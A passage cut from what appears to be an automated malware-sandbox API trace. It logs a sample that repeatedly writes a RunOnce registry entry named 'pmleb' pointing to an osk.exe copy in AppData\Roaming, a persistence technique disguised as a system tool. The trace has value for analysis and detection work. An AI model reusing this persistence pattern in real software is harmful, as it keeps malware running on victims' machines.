varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.407] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.407] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.407] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0082.407] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.407] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x73 [0082.407] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.408] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0082.408] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.408] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.408] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.408] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.408] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0082.409] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.409] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.409] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.409] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.409] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.409] RegCloseKey (hKey=0x280) returned 0x0 [0082.409] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.409] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.409] SetTimer (hWnd=0x20280, nIDEvent=0x20ee, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ee [0082.409] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.420] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.420] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.420] KillTimer (hWnd=0x20280, uIDEvent=0x20ee) returned 1 [0082.421] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.421] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.421] IUnknown:Release (This=0x787518) returned 0x1 [0082.421] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.421] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.421] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.421] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.421] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.421] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0082.421] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.421] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x74 [0082.422] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.422] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0082.422] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.422] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.422] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.422] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.422] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.422] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.423] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.423] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.423] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.423] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0082.423] RegCloseKey (hKey=0x280) returned 0x0 [0082.423] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.423] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.423] SetTimer (hWnd=0x20280, nIDEvent=0x20ef, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ef [0082.423] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.436] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.436] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.436] KillTimer (hWnd=0x20280, uIDEvent=0x20ef) returned 1 [0082.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.436] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.436] IUnknown:Release (This=0x787518) returned 0x1 [0082.437] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.437] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.437] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.437] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.437] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 
[0082.437] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.437] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x75 [0082.437] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.438] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0082.438] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.438] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.438] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.438] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.438] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.438] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.438] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.439] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.439] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.439] RegCloseKey (hKey=0x280) returned 0x0 [0082.439] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.439] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.439] SetTimer (hWnd=0x20280, nIDEvent=0x20f0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f0 [0082.439] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.451] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.451] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.452] KillTimer (hWnd=0x20280, uIDEvent=0x20f0) returned 1 [0082.452] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.452] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.452] IUnknown:Release (This=0x787518) returned 0x1 [0082.452] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 